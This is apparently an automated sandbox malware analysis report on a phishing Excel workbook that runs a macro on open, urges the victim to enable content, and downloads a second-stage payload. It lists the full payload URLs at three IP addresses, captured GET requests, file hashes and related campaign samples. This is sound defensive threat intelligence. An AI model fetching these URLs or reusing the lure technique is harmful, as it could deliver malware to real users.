
Analysis Report Outstanding-Debt-1754918061-05042021.xlsm

Overview

General Information

Sample Name: Outstanding-Debt-1754918061-05042021.xlsm
Analysis ID: 404114
MD5: 5ac72cad6c794e97474276ba534aa095
SHA1: 5236650b529792d7aa754c62e1db170a62ecc13d
SHA256: 06b4a994cc6b9629775ebfcf818cd44267af85d7515980d4edc3c174ac47b6da

Detection

Hidden Macro 4.0
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Allocates a big amount of memory (probably used for heap spraying)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1928, cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview


Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: excel.exe | Memory has grown: Private usage: 4MB later: 34MB
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 91.211.91.81:80
Source: Joe Sandbox View | IP Address: 91.211.91.81
Source: Joe Sandbox View | IP Address: 5.34.179.36
Source: global traffic | HTTP traffic detected:
  GET /44313,6048108796.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 91.211.91.81
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /44313,6048108796.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 5.34.179.36
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /44313,6048108796.dat HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: 45.153.229.23
  Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 91.211.91.81
Source: unknown | TCP traffic detected without corresponding DNS query: 5.34.179.36
Source: unknown | TCP traffic detected without corresponding DNS query: 45.153.229.23
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7533C53B.jpg

System Summary:

Found malicious Excel 4.0 Macro
Source: Outstanding-Debt-1754918061-05042021.xlsm | Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable editing button from the yellow bar above 22 0 Once you have enabled editing please click Ena
Source: Screenshot number: 4 | Screenshot OCR: Enable Content button from the yellow bar above 23 24 25 26 27 28 29 30 31 32 33 34 35
Found Excel 4.0 Macro with suspicious formulas
Source: Outstanding-Debt-1754918061-05042021.xlsm | Initial sample: EXEC
Source: Outstanding-Debt-1754918061-05042021.xlsm | OLE, VBA macro line: Private Sub Auto_Open()
Source: Outstanding-Debt-1754918061-05042021.xlsm | OLE indicator, VBA macros: true
Source: classification engine | Classification label: mal64.expl.evad.winXLSM@1/8@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Outstanding-Debt-1754918061-05042021.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD4AC.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Outstanding-Debt-1754918061-05042021.xlsm | Initial sample: OLE zip file path = xl/media/image1.jpg
Source: Outstanding-Debt-1754918061-05042021.xlsm | Initial sample: OLE zip file path = xl/drawings/drawing2.xml
Source: Outstanding-Debt-1754918061-05042021.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outstanding-Debt-1754918061-05042021.xlsm | Initial sample: OLE zip file path = xl/drawings/_rels/drawing2.xml.rels
Source: Outstanding-Debt-1754918061-05042021.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (reported 22 times)

Mitre Att&ck Matrix

Techniques are listed per tactic column, in the row order of the original matrix (trailing digits are the report's own match counts):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Scripting22; Exploitation for Client Execution12; At (Linux); At (Windows)
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Extra Window Memory Injection1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Masquerading1; Disable or Modify Tools1; Scripting22; Extra Window Memory Injection1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: File and Directory Discovery1; System Information Discovery1; Query Registry; System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Non-Application Layer Protocol1; Application Layer Protocol11; Ingress Tool Transfer2; Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source: Outstanding-Debt-1754918061-05042021.xlsm | Detection: 2% | Scanner: ReversingLabs | Label: Win32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

http://45.153.229.23/44313,6048108796.dat | Virustotal: 5% | Avira URL Cloud: 0% (safe)
http://5.34.179.36/44313,6048108796.dat | Virustotal: 3% | Avira URL Cloud: 0% (safe)
http://91.211.91.81/44313,6048108796.dat | Virustotal: 5% | Avira URL Cloud: 0% (safe)

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

http://45.153.229.23/44313,6048108796.dat | Malicious: false | Antivirus detection: Virustotal 5%, Avira URL Cloud safe | Reputation: unknown
http://5.34.179.36/44313,6048108796.dat | Malicious: false | Antivirus detection: Virustotal 3%, Avira URL Cloud safe | Reputation: unknown
http://91.211.91.81/44313,6048108796.dat | Malicious: false | Antivirus detection: Virustotal 5%, Avira URL Cloud safe | Reputation: unknown

Contacted IPs


Public

91.211.91.81 | Domain: unknown | Country: Ukraine | ASN: 206638 (HOSTFORYUA) | Malicious: false
5.34.179.36 | Domain: unknown | Country: Ukraine | ASN: 204957 (GREENFLOID-ASUA) | Malicious: false
45.153.229.23 | Domain: unknown | Country: Russian Federation | ASN: 25229 (VOLIA-ASUA) | Malicious: false

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404114
Start date: 04.05.2021
Start time: 18:23:38
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 4m 50s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Outstanding-Debt-1754918061-05042021.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name: Without Instrumentation
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal64.expl.evad.winXLSM@1/8@0/3
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Each match lists the associated sample name, its detection, and the context in which the IP was seen.

Match: 91.211.91.81
  • Outstanding-Debt-170373600-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 91.211.91.81/44313,6048108796.dat
Match: 5.34.179.36
  • Outstanding-Debt-170373600-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 5.34.179.36/44313,6048108796.dat

Domains

No context

ASN

Each match lists the associated sample name, its detection, and the IP in that ASN the sample contacted.

Match: GREENFLOID-ASUA
  • Outstanding-Debt-170373600-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 5.34.179.36
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 5.34.179.36
  • tetup.exe (malicious): 107.181.174.176
  • ba820cf3_by_Libranalysis.exe (malicious): 195.123.238.191
  • a8331229_by_Libranalysis.exe (malicious): 195.123.238.191
  • 5f0e0f15_by_Libranalysis.exe (malicious): 195.123.238.191
  • 2f50000.exe (malicious): 45.90.59.62
  • 9177284661-04302021.xlsm (malicious): 82.118.21.70
  • 9177284661-04302021.xlsm (malicious): 82.118.21.70
  • 9177284661-04302021.xlsm (malicious): 82.118.21.70
  • EgW5u2WYG2.exe (malicious): 45.134.255.99
  • 7IXb5bOTOQ.exe (malicious): 45.134.255.61
  • DU61r0xvZ7.exe (malicious): 82.118.23.184
Match: HOSTFORYUA
  • Outstanding-Debt-170373600-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 91.211.91.81
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 91.211.91.81
  • Complaint-1770799750-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-1770799750-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-1505499457-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-1770799750-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-1505499457-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-1505499457-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-937314470-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-937314470-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-793844517-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-937314470-04302021.xlsm (malicious): 2.56.244.189
  • Complaint-793844517-04302021.xlsm (malicious): 2.56.244.189
Match: VOLIA-ASUA
  • Outstanding-Debt-170373600-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-1754918061-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-439798376-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 45.153.229.23
  • Outstanding-Debt-1636503299-05042021.xlsm (malicious): 45.153.229.23
  • 7D1E.exe (malicious): 77.123.139.190
  • 2f50000.exe (malicious): 91.203.5.165
  • jX16Cu330u.exe (malicious): 77.123.139.190
  • 5jHZqgYHCZ.exe (malicious): 77.123.139.190
  • z3LOkpYy4s.exe (malicious): 77.123.139.190
  • dl6jAtWJeR.exe (malicious): 77.123.139.190
  • YVNw1T4L7m.exe (malicious): 77.123.139.190
  • QsO4ETjF7s.exe (malicious): 77.123.139.190
  • Rk5T3e6g5m.exe (malicious): 77.123.139.190
  • 9b3d7f02.exe (malicious): 91.203.5.155
  • a5DohSoj1A.exe (malicious): 77.123.139.190

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7533C53B.jpg
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 1080x1080, frames 3
Category: dropped
Size (bytes): 92379
Entropy (8bit): 7.654577060340879
Encrypted: false
SSDEEP: 1536:1o1vutINbjOXGw548LBkVb/oyrKXkX89DcO9GQSnIv+C1EDFVxkR7Y90:wvKINbjvw548LMb/oqKO8NnS8+60Kc0
MD5: 4A425E6A5A885C0D0E2589506FD2244B
SHA1: E23482422480A4720E22F311B42BD65E2F3556F8
SHA-256: 76E685FC2035D8CF19945C6686D82054B64D0A9612853D8F428C4B4FE351C160
SHA-512: 3C827E13A12CC817CBD80EA7C89BEC5288FD21250728E76E00D6355008F704C77EC9BC37C85FF076D8D1F960DB53741F352AB649CD2C754B71B4D11CFFBEEA54
Malicious: false
Reputation: moderate, very likely benign file
Preview: ......JFIF.....`.`.....ZExif..MM.*.................J............Q...........Q...........Q..........................C....................................................................C.......................................................................8.8.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..D.G.\.....i].......k.@U.........B..Hw.A...`p;.RsIRHTs..%G?QU.#..$..."...U.A....g].s......c..,....{W'..M.Nc....F.~..y..l..`.e..a..[...P.y]..k_..CI..z.Ru..s.6.Y....."..1]Q......e#.......~.`sk..KH......p.4.i.j+3{.....N.DS..L.....o..o.5f>..jY.uS...Z.B...UG`)..6D....(.....
C:\Users\user\AppData\Local\Temp\F4EE0000
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 117678
Entropy (8bit): 7.689108187269306
Encrypted: false
SSDEEP: 3072:GDFrvKINbjvw548LMb/oqKO8NnS8+60Kcw:GDFmAbT648LM7D98Np+ED
MD5: CEA796E861FFF39C3EAD50BBF15DDDEC
SHA1: 657BDBAC6816E40E3E39A90548B2B904DBEEEC6C
SHA-256: 58DCB51BA98FDC5A8F1F4D649D08C3AAF7F3A9E1A133F46C38BC3299AF589385
SHA-512: 0B02B8B188B51C833BE75179680F12A82DDABCAA3D55C3F3DE0E57212380B1CDCD20069B29E043266D7D3A30D056144E3AF5C1C235B9BFAF40D9D3785DF98469
Malicious: false
Reputation: low
Preview: .U.n.0....?...".....r.y...I>.&..m.$H...K...$$@.zQ;.3\p..V.K.AYS..:"..a.2uE...._.....5P.5.r=..m..v...6."M..7cA4..@...+3.[.....q..5.....k".X.A&.[.......~.t2U..7...UE.sZ...Q.4..... .xi........VS..2.G.....rz.a..V....Xh..?P....rZ.....T..;..._.A.$....?.E..J.W..Sk..<or..%..h.-.-....>.k\.7Qg.re`.v........$.........5d..............4?{.:.&...,_?>?......B.-CFu....p..1.T.z..cw.!=.M-....}.....3..7...r.......;ap.7.B.e.N[...v......z..T]:........c.`.Nx....W.<..r.O........PK..........!.........*.......[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 162688
Entropy (8bit): 4.25430976832062
Encrypted: false
SSDEEP: 1536:C61L3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CgJNSc83tKBAvQVCgOtmXmLpLm4l
MD5: CA4993927BAA93DC2320A4B540D529DA
SHA1: D09E65692992B7CCF20689225D265F7E5FEA29E9
SHA-256: CE27AD38DBC7F39B713741FF2F4C9F9EB9427FAD5F236DB82D7DECD70AB4FA72
SHA-512: A0E7069E05343C9CF8E0D5A611BD215F069DF33F208F2A0895871796FDE3684BF957901632586B337E18AB8424B1C5B2132A558F55B65EA537666E062FA6425E
Malicious: false
Reputation: low
Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed May 5 00:24:44 2021, atime=Wed May 5 00:24:44 2021, length=8192, window=hide
Category: dropped
Size (bytes): 867
Entropy (8bit): 4.4868984204114435
Encrypted: false
SSDEEP: 12:85QzLgXg/XAlCPCHaX2B8GB/bWGyxX+Wnicvb3bDtZ3YilMMEpxRljKY6TdJP9TK:85c/XTm6G4xYePDv3qqrNru/
MD5: F8F333EFB85DBA7D9F14E509AD034E2F
SHA1: C771159ACC15D8E4BEC44661ED64D25D88D465DF
SHA-256: 90782C7345EDBB7A68A1F71872B2305C19BE146734FFA1AB25386B79C716F83E
SHA-512: F13A4B83F3FE4D1C0D91F863EDC549A02F56160491323921B58066C7A73507CA69A9A452B939877F855B8E91324281CD957049E1AA148FB0B656F50E5DCCBCB1
Malicious: false
Reputation: low
Preview: L..................F...........7G..:{.mMA..:{.mMA... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R....Desktop.d......QK.X.R..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......928100..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Outstanding-Debt-1754918061-05042021.LNK
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed May 5 00:24:44 2021, atime=Wed May 5 00:24:44 2021, length=117676, window=hide
Category: modified
Size (bytes): 2298
Entropy (8bit): 4.564022762105565
Encrypted: false
SSDEEP: 48:8Q/XTFGq9wlp8CqQh2Q/XTFGq9wlp8CqQ/:8Q/XJGq9wACqQh2Q/XJGq9wACqQ/
MD5: 7C856E5ADAFFC46C797B02D3A11C8E30
SHA1: D9D5F23B56C34E36DC4479052FFDBF2D73926762
SHA-256: E57CD22342D940FB77E8A6CD42DBD979D591601D7EB5360BB3BFD888801D7C90
SHA-512: A2992A62299F013CD235A499D75E8F9435307447156E6D21AF4D1CD0AD384736CA7CCC2CCBEE62C492FE8082AEFF46FE674A94E289228B0F7865EF1663CA705F
Malicious: false
Reputation: low
Preview: L..................F.... ....".{..:{.mMA..[..mMA...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......R.. .OUTSTA~1.XLS..........Q.y.Q.y*...8.....................O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.5.4.9.1.8.0.6.1.-.0.5.0.4.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\928100\Users.user\Desktop\Outstanding-Debt-1754918061-05042021.xlsm.@.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.u.t.s.t.a.n.d.i.n.g.-.D.e.b.t.-.1.7.5.4.9.1.8.0.6.1.-.0.5.0.4.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 163
Entropy (8bit): 4.89170302234845
Encrypted: false
SSDEEP: 3:oyBVomxWhl2BbtH58ZK6lyEW92BbtH58ZK6lmxWhl2BbtH58ZK6lv:djSlWO7W9WO/lWO1
MD5: DB18784CD80F10B1778579AD9358AA08
SHA1: A0477CFB7A64AC166B8402F78327CC4982A5B3BB
SHA-256: A567BE3CF59A8EAB1E425508C0ECD6F4CAF8A256753A689E629E3761EAC3532A
SHA-512: C6E237BC4AB7A6B8CACA3ED347B5B3C848B019DB47C4D6E9FADDAF6E9BDA215CBED25EF3D6A4272FDCC4155F12D8D860CDB6F33BD1D9B2885684CB4B3FB63443
Malicious: false
Reputation: low
Preview: Desktop.LNK=0..[misc]..Outstanding-Debt-1754918061-05042021.LNK=0..Outstanding-Debt-1754918061-05042021.LNK=0..[misc]..Outstanding-Debt-1754918061-05042021.LNK=0..
C:\Users\user\Desktop\06EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):117676
Entropy (8bit):7.689137730764648
Encrypted:false
SSDEEP:3072:G8rvKINbjvw548LMb/oqKO8NnS8+60Kc6:G8mAbT648LM7D98Np+Ev
MD5:7CC089B2304EF9316ABA9B5480D9E1BF
SHA1:AF99A1D206A4930FFD732825B5A55C797CBC60C6
SHA-256:AF8AD8FD59F2101BC6C948A2ACE5E4BE506A7038357E1F692BA58B3D894C2768
SHA-512:3987EC112FA915635EF1B2631CFCBF238135872966BBC6276C55707175F634CA159221BA00D4F97C47F6465A44CF2051AAFD8FE65B8156D90ECB0EE0E2F7B83D
Malicious:false
Reputation:low
C:\Users\user\Desktop\~$Outstanding-Debt-1754918061-05042021.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:high, very likely benign file

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.68857711695949
TrID:
  • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
  • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
  • ZIP compressed archive (8000/1) 7.58%
File name:Outstanding-Debt-1754918061-05042021.xlsm
File size:116934
MD5:5ac72cad6c794e97474276ba534aa095
SHA1:5236650b529792d7aa754c62e1db170a62ecc13d
SHA256:06b4a994cc6b9629775ebfcf818cd44267af85d7515980d4edc3c174ac47b6da
SHA512:49dd09144dcd2a2564545636491fd4a86c0b7263702d0ccdaa846795ea5d039df832dbf510f02c65e08c62b37e2e21540f8fe833925996a39b3db55914fc5673
SSDEEP:3072:1kYvKINbjvw548LMb/oqKO8NnS8+60Kc+ECx:WAbT648LM7D98Np+EdECx

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "/opt/package/joesandbox/database/analysis/404114/sample/Outstanding-Debt-1754918061-05042021.xlsm"

Indicators

Has Summary Info:False
Application Name:unknown
Encrypted Document:False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:True

Summary

Author:Rabota
Last Saved By:Noped
Create Time:2015-06-05T18:19:34Z
Last Saved Time:2021-05-04T08:11:27Z
Creating Application:Microsoft Excel
Security:0

Document Summary

Thumbnail Scaling Desired:false
Company:
Contains Dirty Links:false
Shared Document:false
Changed Hyperlinks:false
Application Version:16.0300

Streams with VBA

VBA File Name: Blasr.bas, Stream Size: 1166
General
Stream Path:VBA/Blasr
VBA File Name:Blasr.bas
Stream Size:1166

VBA Code Keywords

Keyword
"Blasr"
Application.Run
Attribute
Auto_Open()
VB_Name
Private
VBA Code
Attribute VB_Name = "Blasr"
